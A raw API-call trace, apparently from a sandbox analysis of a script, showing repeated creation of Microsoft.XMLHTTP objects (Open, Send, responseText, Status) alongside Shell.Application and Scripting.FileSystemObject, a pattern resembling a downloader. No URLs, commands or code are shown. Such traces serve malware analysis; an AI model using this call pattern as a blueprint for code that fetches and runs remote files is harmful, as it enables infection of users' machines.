	[0291.780] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0291.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0291.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0291.780] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0291.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0292.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0292.702] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0292.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0292.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0292.702] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0292.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0292.703] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0292.703] SysStringLen (param_1=0x0) returned 0x0
	[0292.703] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0292.703] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0292.703] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0292.703] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0292.703] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0292.703] ??2@YAPEAX_K@Z () returned 0x62f350
	[0292.703] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0292.703] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0292.703] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0292.703] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0292.703] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0292.704] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0292.704] SysStringLen (param_1=0x0) returned 0x0
	[0292.704] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0292.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0292.707] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0292.707] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0292.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0292.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0292.707] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0294.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0294.279] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0294.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0294.281] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0294.281] SysStringLen (param_1=0x0) returned 0x0
	[0294.281] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0294.281] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0294.281] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0294.281] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0294.281] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0294.281] ??2@YAPEAX_K@Z () returned 0x62f310
	[0294.281] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f310) 
	[0294.281] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0294.282] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0294.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0294.282] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0294.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0294.282] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0294.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0294.284] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0294.285] SysStringLen (param_1=0x0) returned 0x0
	[0294.285] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0294.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0294.285] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0294.285] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0294.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0294.285] ??2@YAPEAX_K@Z () returned 0x62f330
	[0294.285] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f330) 
	[0294.285] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0294.285] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0294.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0294.285] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0294.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0294.286] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0294.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0294.286] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0294.286] SysStringLen (param_1=0x0) returned 0x0
	[0294.286] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0294.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0294.286] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0294.286] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0294.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0294.286] ??2@YAPEAX_K@Z () returned 0x62f310
	[0294.286] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0294.286] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0294.286] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0294.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0294.287] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0294.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0294.287] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0294.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0294.287] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0294.287] SysStringLen (param_1=0x0) returned 0x0
	[0294.287] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0294.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0294.287] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0294.287] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0294.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0294.288] ??2@YAPEAX_K@Z () returned 0x62f330
	[0294.288] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f330) 
	[0294.288] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0294.288] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0294.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0294.288] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0294.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
